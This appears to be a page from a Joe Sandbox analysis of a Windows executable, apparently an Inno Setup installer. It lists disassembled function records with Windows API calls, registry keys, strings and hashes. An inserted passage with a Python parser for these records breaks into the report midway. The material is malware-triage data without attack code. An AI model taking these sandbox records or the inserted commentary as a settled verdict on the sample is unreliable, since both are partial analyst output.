                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressDeleteHandleModuleProc
                                                          • String ID: RegDeleteKeyExA$advapi32.dll
                                                          • API String ID: 588496660-1846899949
                                                          • Opcode ID: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
                                                          • Instruction ID: 9c024767392e34e1239b6ccdb0e78e824d69575b4a8d701ce7db5acd733af5c1
                                                          • Opcode Fuzzy Hash: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
                                                          • Instruction Fuzzy Hash: B2E06DF1B41B30AAD72426697C8AFA72728DB74365F618537B105AD1A183FC1C50CE9D
                                                          Strings
                                                          • NextButtonClick, xrefs: 0046BA6C
                                                          • PrepareToInstall failed: %s, xrefs: 0046BC8E
                                                          • Need to restart Windows? %s, xrefs: 0046BCB5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                          • API String ID: 0-2329492092
                                                          • Opcode ID: c85eed945518d546ff95eb83013acbbea6e3c59c24d52283f76f7584732158fe
                                                          • Instruction ID: ef605359146084d2a330ce9392c81193c54d44d6395a219c566c339d74a55226
                                                          • Opcode Fuzzy Hash: c85eed945518d546ff95eb83013acbbea6e3c59c24d52283f76f7584732158fe
                                                          • Instruction Fuzzy Hash: F6D12A34A04108DFCB10EF99D585AEE77F5EF49304F6444BAE400AB352D778AE81CB9A
                                                          APIs
                                                          • SetActiveWindow.USER32(?,?,00000000,00482990), ref: 0048276C
                                                          • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482801
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ActiveChangeNotifyWindow
                                                          • String ID: $Need to restart Windows? %s
                                                          • API String ID: 1160245247-4200181552
                                                          • Opcode ID: 205c42aac985357c00af048fdaf18b998a02a4faeff7a2d0de879de7ff73840d
                                                          • Instruction ID: d92f6dc0c394a11860c555715cc1377d1ab7d31dc5c27e132739ea4afdffe6c1
                                                          • Opcode Fuzzy Hash: 205c42aac985357c00af048fdaf18b998a02a4faeff7a2d0de879de7ff73840d
                                                          • Instruction Fuzzy Hash: 5291A274A042049FDB10FB69D986BAD77F4AF55308F1084BBE8009B362D7B86D05CB5D
                                                          APIs
                                                            • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                          • GetLastError.KERNEL32(00000000,0046FAF9,?,?,0049C1D0,00000000), ref: 0046F9D6
                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FA50
                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FA75
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ChangeNotify$ErrorFullLastNamePath
                                                          • String ID: Creating directory: %s
                                                          • API String ID: 2451617938-483064649
                                                          • Opcode ID: d149bf9a4864bf308676d1666e2ddee2b554becc532c3436bbb106b5e5686cba
                                                          • Instruction ID: 2bd83b05653ced0f0f619092410e1b81403e7cd9e02354fb4b3544f6b0b1216d
                                                          • Opcode Fuzzy Hash: d149bf9a4864bf308676d1666e2ddee2b554becc532c3436bbb106b5e5686cba
                                                          • Instruction Fuzzy Hash: 0F512174E00248ABDB01DFE9D582BDEBBF5AF48304F50847AE844B7396D7785E088B59
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E56
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F1C), ref: 00454EC0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressByteCharMultiProcWide
                                                          • String ID: SfcIsFileProtected$sfc.dll
                                                          • API String ID: 2508298434-591603554
                                                          • Opcode ID: e7edbd208805aa306e5bb6f456733d4c36fbf9170141b95da0f44c83ccf47135
                                                          • Instruction ID: 176d29f9623cbc30a6d26dfc77e51d4098360506d5c3757ea1f9e8bf8263b863
                                                          • Opcode Fuzzy Hash: e7edbd208805aa306e5bb6f456733d4c36fbf9170141b95da0f44c83ccf47135
                                                          • Instruction Fuzzy Hash: 21416670A04218ABE720EB55DC86B9E77B8EB44309F5041B7E908A7293D7785F89CF5C
                                                          APIs
                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                          • UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                          • RegisterClassA.USER32(?), ref: 004164C6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Class$InfoRegisterUnregister
                                                          • String ID: @
                                                          • API String ID: 3749476976-2766056989
                                                          • Opcode ID: 58713160258ce5f561964bbdae6a2794c8f6f6caf00f6f1604bd66b56dd4b990
                                                          • Instruction ID: 9d11af1acff112dbe95f15f3a9399eab9f365f4a7252c57533c35fba51c14aa0
                                                          • Opcode Fuzzy Hash: 58713160258ce5f561964bbdae6a2794c8f6f6caf00f6f1604bd66b56dd4b990
                                                          • Instruction Fuzzy Hash: 81316F702043409BD720EF68C981B9B77E5AB89308F04457FF949DB392DB39D944CB6A
                                                          APIs
                                                          • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDBD
                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                            • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                            • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                          • API String ID: 395431579-1506664499
                                                          • Opcode ID: 07c44bdcd03860b1f33b3045299bb1d0449c98b3a7b2341f9148d4efe18bbe9e
                                                          • Instruction ID: abd39ea96fbc8e8598eec473428a27bf92d63543bd8a2491ee7d7de58c90140d
                                                          • Opcode Fuzzy Hash: 07c44bdcd03860b1f33b3045299bb1d0449c98b3a7b2341f9148d4efe18bbe9e
                                                          • Instruction Fuzzy Hash: B1117330B00319BFD711EB62ED85B8E7BA8EB55704F90407BF400A6691D778AE05865D
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(?,00455A4F,?,00000001,00000000), ref: 00455A42
                                                          Strings
                                                          • PendingFileRenameOperations, xrefs: 00455A14
                                                          • PendingFileRenameOperations2, xrefs: 00455A23
                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004559F0
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                          • API String ID: 47109696-2115312317
                                                          • Opcode ID: bdd8c77769c6bad55690eeddcdbd75d9d8896b7276d3d2e2d12af9b25540c28f
                                                          • Instruction ID: 0e3b4bd859061d9736a48b3f0c398de546ea7d73752f370084b2b16911b021d7
                                                          • Opcode Fuzzy Hash: bdd8c77769c6bad55690eeddcdbd75d9d8896b7276d3d2e2d12af9b25540c28f
                                                          • Instruction Fuzzy Hash: 31F09671744A08EFDB04D6A6DC62E7A739DD744711FA04477F800D7682DA7DAD04962C
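The function records above all share one shape (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), and the detail an analyst wants out of them is scattered across the argument column and the String ID field: the RegDeleteKeyExA record, for instance, prints GetProcAddress(00000000,advapi32.dll) while the export name only appears in the GetModuleHandleA arguments and in the String ID. The Python below is an added example, not code from the report or from Joe Sandbox: a parser for this record layout that pulls out each function's API chain, string literals, DLLs named and exports resolved at run time, run over two records copied from this page (embedded as constructed input). The class and function names are this example's own. A caveat when reading this stretch of records: literals such as `_isetup`, `\_setup64.tmp`, `Created temporary directory:`, `PrepareToInstall failed:` and `NextButtonClick` are characteristic of the Inno Setup installer runtime, so the run-time resolution of RegDeleteKeyExA, SfcIsFileProtected and SHAutoComplete and the PendingFileRenameOperations lookup here are ordinary behaviour of the installer wrapper rather than payload logic.

```python
"""Parser for the Joe Sandbox 'IDA Plugin' function records shown on this page (APIs,
Strings, Memory Dump Source, Similarity). Added example, not code from the report."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?:Part of subcall function ([0-9A-Fa-f]{8}): )?"
                    r"(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]{8})$")
XREF_RE = re.compile(r"^(.*), xrefs: ([0-9A-Fa-f]{8})$")
FIELD_RE = re.compile(r"^([A-Za-z ]+?): ?(.*)$")
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")
IDENT_RE = re.compile(r"^[A-Za-z_]\w*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                       # call-site address
    subcall_of: str | None = None  # set for "Part of subcall function X:" lines


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)  # (literal, xref)
    fields: dict[str, str] = field(default_factory=dict)          # "Key: value" lines, last wins

    def string_ids(self) -> list[str]:
        # The report joins a function's literals with '$'; a leading '$' is an empty literal.
        return [s for s in self.fields.get("String ID", "").split("$") if s]


def parse_records(text: str) -> list[FunctionRecord]:
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            # An APIs/Strings header after a finished Similarity block opens the next record.
            if line in ("APIs", "Strings") and (rec is None or rec.fields):
                rec = FunctionRecord()
                records.append(rec)
            section = line
        elif rec is None:
            continue
        elif section == "APIs" and (m := API_RE.match(line)):
            sub, name, module, args, ref = m.groups()
            rec.apis.append(ApiCall(name, module, args.split(","), ref, sub))
        elif section == "Strings" and (m := XREF_RE.match(line)):
            rec.strings.append((m.group(1), m.group(2)))
        elif section not in ("APIs", "Strings") and (m := FIELD_RE.match(line)):
            rec.fields[m.group(1)] = m.group(2)
    return records


def resolved_exports(rec: FunctionRecord) -> list[str]:
    """Exports the function resolves at run time (GetProcAddress records only). The argument
    column alone is unreliable (the RegDeleteKeyExA record prints GetProcAddress(00000000,
    advapi32.dll)), so candidates come from all call arguments plus the record's literals."""
    if not any(c.name == "GetProcAddress" for c in rec.apis):
        return []
    tokens = [a for c in rec.apis for a in c.args] + rec.string_ids() + [s for s, _ in rec.strings]
    # Identifiers only: 8-hex-digit values are excluded, and DLL names fail the identifier test.
    return [t for t in dict.fromkeys(tokens) if IDENT_RE.match(t) and not HEX8_RE.match(t)]


def summarize(text: str) -> list[dict]:
    """Per-function view: API chain, DLLs named, exports resolved at run time, literals."""
    out = []
    for rec in parse_records(text):
        tokens = [a for c in rec.apis for a in c.args] + rec.string_ids()
        out.append({
            "opcode_id": rec.fields.get("Opcode ID", "")[:16],
            "apis": [c.name for c in rec.apis],
            "modules": sorted({t.lower() for t in tokens if t.lower().endswith(".dll")}),
            "resolved_exports": resolved_exports(rec),
            "strings": [s for s, _ in rec.strings] or rec.string_ids(),
        })
    return out


# Constructed input: two records copied from this page in the report's own layout.
SAMPLE = r"""APIs
• RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE48
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFE3,00000000,0042DFFB,?,?,?,?,00000006,?,00000000,00496D69), ref: 0042DE63
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE69
Similarity
• String ID: RegDeleteKeyExA$advapi32.dll
• Opcode ID: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
APIs
  • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
• RegCloseKey.ADVAPI32(?,00455A4F,?,00000001,00000000), ref: 00455A42
Strings
• PendingFileRenameOperations, xrefs: 00455A14
• PendingFileRenameOperations2, xrefs: 00455A23
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004559F0
Similarity
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
• Opcode ID: bdd8c77769c6bad55690eeddcdbd75d9d8896b7276d3d2e2d12af9b25540c28f
"""
```

`summarize(SAMPLE)` returns one dict per record; for the first record `resolved_exports` yields `['RegDeleteKeyExA']` even though the GetProcAddress line itself names only advapi32.dll, and the second record carries the subcall address 0042DE14 on its RegOpenKeyExA entry. To run it over the whole report, paste the function records into `parse_records` unchanged; the "Download File" link labels and the bullet characters are tolerated by the parser.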
                                                          APIs
                                                          • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?,00000000), ref: 0047F3E6
                                                          • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?), ref: 0047F3F3
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749), ref: 0047F4E8
                                                          • FindClose.KERNEL32(000000FF,0047F513,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?), ref: 0047F506
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileNext
                                                          • String ID:
                                                          • API String ID: 2066263336-0
                                                          • Opcode ID: b461a46803c2cc4ea78060a2329edfdb5f867b3d72b18562307b1542635c1f41
                                                          • Instruction ID: 93840f20d66fcb2e286325320114c4d74e835c6895e54ad5a4f30f132b089a3b
                                                          • Opcode Fuzzy Hash: b461a46803c2cc4ea78060a2329edfdb5f867b3d72b18562307b1542635c1f41
                                                          • Instruction Fuzzy Hash: 19512F71A00658AFCB21DF65CC45ADEB7B8EB48319F5084BAA818E7341D7389F49CF54
                                                          APIs
                                                          • GetMenu.USER32(00000000), ref: 00421359
                                                          • SetMenu.USER32(00000000,00000000), ref: 00421376
                                                          • SetMenu.USER32(00000000,00000000), ref: 004213AB
                                                          • SetMenu.USER32(00000000,00000000), ref: 004213C7
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Menu
                                                          • String ID:
                                                          • API String ID: 3711407533-0
                                                          • Opcode ID: 2199c62fdc40b6f857ca540156f476da1cd3d0498d35d1cb2f117de972eee6cd
                                                          • Instruction ID: 7bb7859a2cdb5f88754e70ccfd218d349751ef7fdbf43141b5448ef52fdf7b61
                                                          • Opcode Fuzzy Hash: 2199c62fdc40b6f857ca540156f476da1cd3d0498d35d1cb2f117de972eee6cd
                                                          • Instruction Fuzzy Hash: 0141B03070025456EB20EB3AA8857AB36D64F61308F4856BFBC44DF7A3CA7CCC5583A9
                                                          APIs
                                                          • SendMessageA.USER32(?,?,?,?), ref: 00416B7C
                                                          • SetTextColor.GDI32(?,00000000), ref: 00416B96
                                                          • SetBkColor.GDI32(?,00000000), ref: 00416BB0
                                                          • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BD8
                                                          APIs
                                                          • WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                          • CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                          APIs
                                                          • 73A1A570.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                          • EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                          • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                          APIs
                                                            • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                          • FlushFileBuffers.KERNEL32(?), ref: 0045C2B9
                                                          Strings
                                                          • NumRecs range exceeded, xrefs: 0045C1B6
                                                          • EndOffset range exceeded, xrefs: 0045C1ED
                                                          APIs
                                                            • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                            • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                            • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                            • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                            • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                            • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                            • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                            • Part of subcall function 00409B70: 6F551CD0.COMCTL32(004980D6), ref: 00409B70
                                                            • Part of subcall function 0041094C: GetCurrentThreadId.KERNEL32 ref: 0041099A
                                                            • Part of subcall function 00419038: GetVersion.KERNEL32(004980EA), ref: 00419038
                                                            • Part of subcall function 0044F73C: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                            • Part of subcall function 0044F73C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                            • Part of subcall function 0044FBE4: GetVersionExA.KERNEL32(0049B790,00498103), ref: 0044FBF3
                                                            • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                            • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                            • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                            • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                            • Part of subcall function 00456ED4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                            • Part of subcall function 0046441C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                            • Part of subcall function 0046441C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                            • Part of subcall function 0046CC10: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                            • Part of subcall function 004786B4: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                            • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                            • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                            • Part of subcall function 004950C0: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 004950D9
                                                          • SetErrorMode.KERNEL32(00000001,00000000,00498178), ref: 0049814A
                                                            • Part of subcall function 00497E74: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                            • Part of subcall function 00497E74: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                            • Part of subcall function 004244CC: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244EB
                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                          • ShowWindow.USER32(?,00000005,00000000,00498178), ref: 004981AB
                                                            • Part of subcall function 00481B8C: SetActiveWindow.USER32(?), ref: 00481C3A
                                                          Strings
                                                          • Setup
                                                          APIs
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DC34
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DCA4
                                                          Strings
                                                          • 2H
                                                          APIs
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A3E
                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A47
                                                          Strings
                                                          • .tmp
                                                          APIs
                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C10E,00000000,0047C124,?,?,?,?,00000000), ref: 0047BEEA
                                                          Strings
                                                          • RegisteredOrganization
                                                          • RegisteredOwner
                                                          APIs
                                                          • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                          Strings
                                                          • Inno Setup: Setup Version
                                                          • r_G
                                                          APIs
